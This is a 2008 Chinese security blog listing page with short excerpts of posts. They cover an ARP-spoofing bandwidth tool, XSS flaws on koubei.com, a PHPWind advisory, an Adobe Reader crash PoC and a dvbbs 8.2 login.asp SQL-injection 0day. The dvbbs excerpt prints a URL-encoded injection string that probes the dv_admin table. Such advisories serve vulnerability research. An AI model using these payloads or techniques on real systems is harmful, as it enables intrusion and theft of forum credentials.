您正在查看 "网络安全" 分类下的文章
2008-06-07 11:38
作者:cnqing
软件说明:
可突破任意ARP防火墙,以限制流量为目标的简单网络管理软件。
使用方法:
1.在参数设置中选择好工作网卡;
2.检查网关信息和本机信息是否正确,如果不正确,请手动输入,无需保存;
3.点击流量探测或手动添加或自动扫描以填充目标列表;
4.设置一个代理,最好不同于目标,代理设置后,只有代理主机会收到伪流量;
5.选择要限制网速的主机;
|
2008-06-06 13:33
2008-06-06 13:31
2008-06-04 21:49
转自:余弦
口碑网www.koubei.com,很火的一个WEB2.0信息共享网站。口碑确实不错,不过安全性就不是这样了。刚刚发现的两个XSS Trap,可以轻易爆发XSS WORM。口碑网的XSS Trap肯定不止这两个,其它的就没渗透的必要了:)
XSS Trap ONE:
博客的发表文章处,这个编辑器我估计是漏洞不少,虽然在客户端过滤的不错,但是使用Firefox的Tamper Data插件就轻易绕过。发文章时,Tamper Data截获的部分数据如下:
|
2008-06-03 09:03
文章作者:sunwear
信息来源:邪恶八进制信息安全团队( www.eviloctal.com)
不要说你不知道metasploit.
没用过他强大的
metasploit framework 溢出工具包?
站长hd moore可是牛X黑客呀. 开发团队个个都是漏洞高手. 估计一生气,邪八就要被黑了。哈哈 helvin大哥做好备份.
 |
2008-06-01 11:56
2008-06-01 11:53
漏洞发布:http://www.80sec.com/
漏洞作者:jian...@80sec.com
漏洞厂商: http://www.phpwind.com/
PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因 |
2008-05-31 10:44
利用方式:一个典型的sql注射漏洞,按照公告里说的用
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
|
2008-05-30 12:13
Adobe Acrobat Reader <= 8.1.2 Reader Remote Denial Of Service
the reader deadly crash when a malformed Pdf file is opened:
00414141 AcroRd32.00414141
greetz to : Deimos, benjilenoob, Berga , http://spiritofhack.net/
Poc : http://milw0rm.com/sploits/2008-HI2.pdf
PS:实验了一下~好用 呵呵~ |
2008-05-30 12:10
by where(hackerb@126.com)
漏洞描述:
中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。
漏洞等级: |
|
| 
